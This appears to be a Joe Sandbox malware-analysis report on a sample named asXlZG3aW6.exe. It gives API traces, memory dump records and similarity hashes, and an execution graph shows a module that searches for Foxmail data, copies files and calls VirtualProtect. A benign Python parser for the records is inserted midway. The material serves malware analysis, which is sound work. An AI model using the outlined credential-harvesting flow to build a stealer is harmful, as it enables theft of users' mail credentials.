                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                     • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 1100898210-3355392842
                                                                                                                                                                                    • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                                                                                                                                                    • Instruction ID: 7d8ce370987dd57b7bf148727d206b09ac62311aee63c146eb442539f55f5a8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC
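The per-function records above (the APIs, Strings, Memory Dump Source and Similarity blocks) are what survives copy-and-paste from a Joe Sandbox report, but they are awkward to group or diff by eye. The parser below is an added example, not part of the Joe Sandbox report or its tooling: it turns such records into dicts, orders each function's direct calls by address, and indexes records by the report's own "API ID" label so that functions with the same import pattern (here the NSIS installer stub's dialog, temp-path and cleanup helpers) can be grouped or compared with another sample's report. The embedded SAMPLE text is constructed from two records shown on this page; the regexes assume exactly the record layout shown above (bullet, `Name.MODULE(args), ref: ADDR`, `Key: value`), and the "Download File" link label that gets fused onto Associated lines is stripped.

```python
"""Parse Joe Sandbox per-function records into dicts and index them.

Added example, not part of the Joe Sandbox report or its tooling.  SAMPLE is
constructed from two records shown on this page; the regexes assume the layout
of those records (bullet, 'Name.MODULE(args), ref: ADDR', 'Key: value').
"""
import re
from collections import defaultdict

SAMPLE = r"""
APIs
• FreeLibrary.KERNEL32(?,761F3410,00000000,C:\Users\user\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
• GlobalFree.KERNEL32(004ABD58), ref: 00403741
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403720
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3355392842
• Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
• Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC
APIs
• IsWindowVisible.USER32(?), ref: 0040502F
• CallWindowProcA.USER32(?,?,?,?), ref: 00405080
  • Part of subcall function 00404072: SendMessageA.USER32(0001044A,00000000,00000000,00000000), ref: 00404084
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$CallMessageProcSendVisible
• API String ID: 3748168415-3916222277
• Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
"""

# A direct call line: "• Name.MODULE(args), ref: ADDR"
API_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-F]{8})$")
# A call made from a callee: "• Part of subcall function ADDR: Name.MODULE("
SUBCALL_RE = re.compile(r"^• Part of subcall function ([0-9A-F]{8}): (\w+)\.(\w+)\(")
# A referenced string: "• value, xrefs: ADDR[, ADDR...]"
STRING_RE = re.compile(r"^• (.*), xrefs: ([0-9A-F, ]+)$")
# Similarity block entries: "• Key: value"
KV_RE = re.compile(r"^• ([^:]+): ?(.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text):
    """Split report text into one dict per function record; 'APIs' opens a record."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if line == "APIs":
                records.append({"apis": [], "subcalls": [], "strings": [],
                                "dumps": [], "similarity": {}})
            continue
        if not records:          # stray text before the first record
            continue
        rec = records[-1]
        if section == "APIs":
            m = SUBCALL_RE.match(line)
            if m:
                rec["subcalls"].append((m[1], m[2], m[3]))   # (caller addr, name, module)
                continue
            m = API_RE.match(line)
            if m:
                rec["apis"].append((m[1], m[2], m[3], m[4]))  # (name, module, args, ref)
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                rec["strings"].append((m[1], m[2].split(", ")))
        elif section == "Memory Dump Source":
            # Drop the "Download File" link label that extraction fuses onto these lines.
            rec["dumps"].append(line.lstrip("• ").removesuffix("Download File"))
        elif section == "Similarity":
            m = KV_RE.match(line)
            if m:
                rec["similarity"][m[1]] = m[2]
    return records


def api_sequence(rec):
    """Direct API names in address order, the shape you would match against a known stub."""
    return [name for name, _, _, ref in sorted(rec["apis"], key=lambda a: int(a[3], 16))]


def index_by_api_id(records):
    """Map Joe Sandbox's 'API ID' label to the Opcode IDs of the functions that share it."""
    out = defaultdict(list)
    for rec in records:
        sim = rec["similarity"]
        if "API ID" in sim:
            out[sim["API ID"]].append(sim.get("Opcode ID", ""))
    return dict(out)


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec["similarity"].get("API ID"), "->", api_sequence(rec),
              "subcalls:", [s[1] for s in rec["subcalls"]], "strings:", [s[0] for s in rec["strings"]])
```

Feed the whole copied report to `parse_records` and `index_by_api_id`; records whose API ID and Opcode ID also appear in a clean NSIS-built installer's report are stub code, which narrows the functions worth reversing to the ones that do not.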
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\asXlZG3aW6.exe,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 0040594A
                                                                                                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\asXlZG3aW6.exe,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405958
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                    • API String ID: 2709904686-3370423016
                                                                                                                                                                                    • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                    • Instruction ID: 9e2646df26482555437471894173605ef17f2c9d125cfcd2b42401f98a5df656
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6D0C9A240DDB1AEE70363249C04B9F6A88DF17710F0944A6E180B61A5C77C4D828BAD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                    • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                    • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A8B
                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                                                                                                                    • Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9

Execution Graph

Execution Coverage:1.9%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0.5%
Total number of Nodes:214
Total number of Limit Nodes:5
execution_graph 8525 367b1c5b 8526 367b1c6b 8525->8526 8529 367b12ee 8526->8529 8528 367b1c87 8530 367b1324 8529->8530 8531 367b13b7 GetEnvironmentVariableW 8530->8531 8555 367b10f1 8531->8555 8534 367b10f1 57 API calls 8535 367b1465 8534->8535 8536 367b10f1 57 API calls 8535->8536 8537 367b1479 8536->8537 8538 367b10f1 57 API calls 8537->8538 8539 367b148d 8538->8539 8540 367b10f1 57 API calls 8539->8540 8541 367b14a1 8540->8541 8542 367b10f1 57 API calls 8541->8542 8543 367b14b5 lstrlenW 8542->8543 8544 367b14d9 lstrlenW 8543->8544 8545 367b14d2 8543->8545 8546 367b10f1 57 API calls 8544->8546 8545->8528 8547 367b1501 lstrlenW lstrcatW 8546->8547 8548 367b10f1 57 API calls 8547->8548 8549 367b1539 lstrlenW lstrcatW 8548->8549 8550 367b10f1 57 API calls 8549->8550 8551 367b156b lstrlenW lstrcatW 8550->8551 8552 367b10f1 57 API calls 8551->8552 8553 367b159d lstrlenW lstrcatW 8552->8553 8554 367b10f1 57 API calls 8553->8554 8554->8545 8556 367b1118 8555->8556 8557 367b1129 lstrlenW 8556->8557 8568 367b2c40 8557->8568 8560 367b1168 lstrlenW 8561 367b1177 lstrlenW FindFirstFileW 8560->8561 8562 367b11e1 8561->8562 8563 367b11a0 8561->8563 8562->8534 8564 367b11aa 8563->8564 8565 367b11c7 FindNextFileW 8563->8565 8564->8565 8570 367b1000 8564->8570 8565->8563 8567 367b11da FindClose 8565->8567 8567->8562 8569 367b1148 lstrcatW lstrlenW 8568->8569 8569->8560 8569->8561 8571 367b1022 8570->8571 8572 367b10af 8571->8572 8573 367b102f lstrcatW lstrlenW 8571->8573 8574 367b10b5 lstrlenW 8572->8574 8585 367b10ad 8572->8585 8575 367b106b lstrlenW 8573->8575 8576 367b105a lstrlenW 8573->8576 8601 367b1e16 8574->8601 8587 367b1e89 lstrlenW 8575->8587 8576->8575 8579 367b10ca 8582 367b1e89 5 API calls 8579->8582 8579->8585 8580 367b1088 GetFileAttributesW 8581 367b109c 8580->8581 8580->8585 8581->8585 8593 367b173a 8581->8593 8584 367b10df 8582->8584 8606 367b11ea 8584->8606 8585->8564 8588 367b2c40 8587->8588 8589 367b1ea7 lstrcatW lstrlenW 8588->8589 8590 367b1ec2 8589->8590 8591 367b1ed1 lstrcatW 8589->8591 8590->8591 8592 367b1ec7 lstrlenW 8590->8592 8591->8580 8592->8591 8594 367b1747 8593->8594 8621 367b1cca 8594->8621 8598 367b199f 8598->8585 8599 367b1824 8599->8598 8641 367b15da 8599->8641 8602 367b1e29 8601->8602 8605 367b1e4c 8601->8605 8603 367b1e2d lstrlenW 8602->8603 8602->8605 8604 367b1e3f lstrlenW 8603->8604 8603->8605 8604->8605 8605->8579 8607 367b120e 8606->8607 8608 367b1e89 5 API calls 8607->8608 8609 367b1220 GetFileAttributesW 8608->8609 8610 367b1246 8609->8610 8611 367b1235 8609->8611 8612 367b1e89 5 API calls 8610->8612 8611->8610 8613 367b173a 35 API calls 8611->8613 8614 367b1258 8612->8614 8613->8610 8615 367b10f1 56 API calls 8614->8615 8616 367b126d 8615->8616 8617 367b1e89 5 API calls 8616->8617 8618 367b127f 8617->8618 8619 367b10f1 56 API calls 8618->8619 8620 367b12e6 8619->8620 8620->8585 8622 367b1cf1 8621->8622 8623 367b1d0f CopyFileW CreateFileW 8622->8623 8624 367b1d55 GetFileSize 8623->8624 8625 367b1d44 DeleteFileW 8623->8625 8626 367b1ede 22 API calls 8624->8626 8630 367b1808 8625->8630 8627 367b1d66 ReadFile 8626->8627 8628 367b1d7d CloseHandle DeleteFileW 8627->8628 8629 367b1d94 CloseHandle DeleteFileW 8627->8629 8628->8630 8629->8630 8630->8598 8631 367b1ede 8630->8631 8635 367b222f 8631->8635 8633 367b224e 8633->8599 8635->8633 8637 367b2250 8635->8637 8649 367b474f 8635->8649 8654 367b47e5 8635->8654 8636 367b2908 8638 367b35d2 RaiseException 8636->8638 8637->8636 8661 367b35d2 8637->8661 8640 367b2925 8638->8640 8640->8599 8642 367b160c 8641->8642 8643 367b163c lstrlenW 8642->8643 8749 367b1c9d 8643->8749 8645 367b1655 lstrcatW lstrlenW 8646 367b1678 8645->8646 8647 367b167e lstrcatW 8646->8647 8648 367b1693 8646->8648 8647->8648 8648->8599 8664 367b4793 8649->8664 8652 367b478f 8652->8635 8653 367b4765 8670 367b2ada 8653->8670 8659 367b56d0 8654->8659 8655 367b570e 8683 367b6368 8655->8683 8657 367b56f9 RtlAllocateHeap 8658 367b570c 8657->8658 8657->8659 8658->8635 8659->8655 8659->8657 8660 367b474f 7 API calls 8659->8660 8660->8659 8662 367b35f2 RaiseException 8661->8662 8662->8636 8665 367b479f 8664->8665 8677 367b5671 RtlEnterCriticalSection 8665->8677 8667 367b47aa 8678 367b47dc 8667->8678 8669 367b47d1 8669->8653 8671 367b2ae3 8670->8671 8672 367b2ae5 IsProcessorFeaturePresent 8670->8672 8671->8652 8674 367b2b58 8672->8674 8682 367b2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8674->8682 8676 367b2c3b 8676->8652 8677->8667 8681 367b56b9 RtlLeaveCriticalSection 8678->8681 8680 367b47e3 8680->8669 8681->8680 8682->8676 8686 367b5b7a GetLastError 8683->8686 8687 367b5b99 8686->8687 8688 367b5b93 8686->8688 8692 367b5bf0 SetLastError 8687->8692 8712 367b637b 8687->8712 8705 367b5e08 8688->8705 8694 367b5bf9 8692->8694 8693 367b5bb3 8719 367b571e 8693->8719 8694->8658 8698 367b5bb9 8700 367b5be7 SetLastError 8698->8700 8699 367b5bcf 8732 367b593c 8699->8732 8700->8694 8703 367b571e 17 API calls 8704 367b5be0 8703->8704 8704->8692 8704->8700 8737 367b5c45 8705->8737 8707 367b5e2f 8708 367b5e47 TlsGetValue 8707->8708 8709 367b5e3b 8707->8709 8708->8709 8710 367b2ada 5 API calls 8709->8710 8711 367b5e58 8710->8711 8711->8687 8717 367b6388 8712->8717 8713 367b63c8 8716 367b6368 19 API calls 8713->8716 8714 367b63b3 RtlAllocateHeap 8715 367b5bab 8714->8715 8714->8717 8715->8693 8725 367b5e5e 8715->8725 8716->8715 8717->8713 8717->8714 8718 367b474f 7 API calls 8717->8718 8718->8717 8720 367b5729 HeapFree 8719->8720 8721 367b5752 8719->8721 8720->8721 8722 367b573e 8720->8722 8721->8698 8723 367b6368 18 API calls 8722->8723 8724 367b5744 GetLastError 8723->8724 8724->8721 8726 367b5c45 5 API calls 8725->8726 8727 367b5e85 8726->8727 8728 367b5ea0 TlsSetValue 8727->8728 8729 367b5e94 8727->8729 8728->8729 8730 367b2ada 5 API calls 8729->8730 8731 367b5bc8 8730->8731 8731->8693 8731->8699 8743 367b5914 8732->8743 8741 367b5c71 8737->8741 8742 367b5c75 8737->8742 8738 367b5c95 8740 367b5ca1 GetProcAddress 8738->8740 8738->8742 8739 367b5ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8739->8741 8740->8742 8741->8738 8741->8739 8741->8742 8742->8707 8744 367b5854 RtlEnterCriticalSection RtlLeaveCriticalSection 8743->8744 8745 367b5938 8744->8745 8746 367b58c4 8745->8746 8747 367b5758 20 API calls 8746->8747 8748 367b58e8 8747->8748 8748->8703 8750 367b1ca6 8749->8750 8750->8645 8751 367bc7a7 8752 367bc7be 8751->8752 8761 367bc82c 8751->8761 8752->8761 8763 367bc7e6 GetModuleHandleA 8752->8763 8754 367bc872 8755 367bc835 GetModuleHandleA 8756 367bc83f 8755->8756 8756->8756 8758 367bc85f GetProcAddress 8756->8758 8756->8761 8757 367bc7dd 8757->8756 8759 367bc800 GetProcAddress 8757->8759 8757->8761 8758->8761 8760 367bc80d VirtualProtect 8759->8760 8759->8761 8760->8761 8762 367bc81c VirtualProtect 8760->8762 8761->8754 8761->8755 8761->8756 8762->8761 8764 367bc7ef 8763->8764 8769 367bc82c 8763->8769 8775 367bc803 GetProcAddress 8764->8775 8766 367bc7f4 8766->8769 8770 367bc800 GetProcAddress 8766->8770 8767 367bc872 8768 367bc835 GetModuleHandleA 8773 367bc83f 8768->8773 8769->8767 8769->8768 8769->8773 8770->8769 8771 367bc80d VirtualProtect 8770->8771 8771->8769 8772 367bc81c VirtualProtect 8771->8772 8772->8769 8773->8769 8774 367bc85f GetProcAddress 8773->8774 8774->8769 8776 367bc82c 8775->8776 8777 367bc80d VirtualProtect 8775->8777 8779 367bc872 8776->8779 8780 367bc835 GetModuleHandleA 8776->8780 8777->8776 8778 367bc81c VirtualProtect 8777->8778 8778->8776 8782 367bc83f 8780->8782 8781 367bc85f GetProcAddress 8781->8782 8782->8776 8782->8781

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 367B11D0
• FindClose.KERNEL32(00000000), ref: 367B11DB
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 7e5e96f8ce171e4e0e1670a0576c719b7de1ce7bad6b3ea7206d50f545897986
• Instruction ID: b5b2c1260c0f6f7a3075e0583311cabcba8dc19719c921d16c601a0a3d621846
• Opcode Fuzzy Hash: 7e5e96f8ce171e4e0e1670a0576c719b7de1ce7bad6b3ea7206d50f545897986
• Instruction Fuzzy Hash: F721827290434CABDB20EA649C4CF9B7B9DEF84314F44092AFA69D7190EB70D605C796

                                                                                                                                                                                    Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 367B1434
  • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1137
  • Part of subcall function 367B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1151
  • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B115C
  • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B116D
  • Part of subcall function 367B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 367B117C
  • Part of subcall function 367B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 367B1193
  • Part of subcall function 367B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 367B11D0
  • Part of subcall function 367B10F1: FindClose.KERNEL32(00000000), ref: 367B11DB
• lstrlenW.KERNEL32(?), ref: 367B14C5
• lstrlenW.KERNEL32(?), ref: 367B14E0
• lstrlenW.KERNEL32(?,?), ref: 367B150F
• lstrcatW.KERNEL32(00000000), ref: 367B1521
• lstrlenW.KERNEL32(?,?), ref: 367B1547
• lstrcatW.KERNEL32(00000000), ref: 367B1553
• lstrlenW.KERNEL32(?,?), ref: 367B1579
• lstrcatW.KERNEL32(00000000), ref: 367B1585
• lstrlenW.KERNEL32(?,?), ref: 367B15AB
• lstrcatW.KERNEL32(00000000), ref: 367B15B7
Strings
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: fbc90490aa71fabf2d106dc56cc8ea3143bc7752691f9927017fb71c601b6cb5
• Instruction ID: e01aae39f1eb7520c19eb8d09f7c15cc044198385cca0b29e8f098a927555109
• Opcode Fuzzy Hash: fbc90490aa71fabf2d106dc56cc8ea3143bc7752691f9927017fb71c601b6cb5
• Instruction Fuzzy Hash: C281D471A10358A9DF20DBA0DC85FEE7B39EF84700F4005A6F609EB190EB759A85CF95

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(367BC7DD), ref: 367BC7E6
• GetModuleHandleA.KERNEL32(?,367BC7DD), ref: 367BC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 367BC860
  • Part of subcall function 367BC803: GetProcAddress.KERNEL32(00000000,367BC7F4), ref: 367BC804
  • Part of subcall function 367BC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC816
  • Part of subcall function 367BC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC82A
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 4c23f2894b53e24bdc6cb03620d872527e4aa4cde49508ade87e729b7c52d10e
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 0A012844D453513CFF1156750C09ABA6FDA9B276A0BD0D7A6E250CF193DEA08506C3F7

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(?,367BC7DD), ref: 367BC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 367BC860
  • Part of subcall function 367BC7E6: GetModuleHandleA.KERNEL32(367BC7DD), ref: 367BC7E6
  • Part of subcall function 367BC7E6: GetProcAddress.KERNEL32(00000000,367BC7F4), ref: 367BC804
  • Part of subcall function 367BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC816
  • Part of subcall function 367BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,367BC7F4,367BC7DD), ref: 367BC82A
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
